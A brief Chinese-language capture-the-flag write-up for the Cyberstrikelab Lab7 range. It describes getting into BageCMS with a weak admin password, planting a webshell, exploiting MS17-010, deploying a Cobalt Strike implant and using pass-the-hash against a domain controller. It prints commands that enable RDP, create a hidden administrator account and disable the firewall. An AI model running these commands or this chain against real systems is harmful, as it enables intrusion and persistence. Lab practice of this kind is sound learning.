跳过正文

Cyberstrikelab-Lab7

·44 字·1 分钟
Cyberstrikelab BageCMS MS17-010 PTH
HYH
作者
HYH
一名专注于网络安全、渗透测试与 CTF 挑战的技术爱好者,热衷于记录实战经验、分享工具与技术,致力于持续学习与成长。
目录

BageCMS
#

fscan扫描到9652端口运行着CMS,版本大概率是3.1

进入/index.php?r=admini,通过弱密码:admin/admin123456进入到后台,编辑模板添加一句话木马
连接蚁剑,在根目录拿到flag1
开启RDP,添加后门用户

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable

可以看到还存在192.168.20.10的段

MS17-010
#

搭建代理后进行内网扫描,发现存在MS17-010

直接读取flag3

PTH
#

添加完用户后走kali的xfreerdp上去关掉设置

然后才能在windows上通过代理连接(估计是我的电脑问题????)
上传一个cs的定向木马,然后进行hashdump
因为是域控,可以进行PTH
在根目录拿到flag2

Reply by Email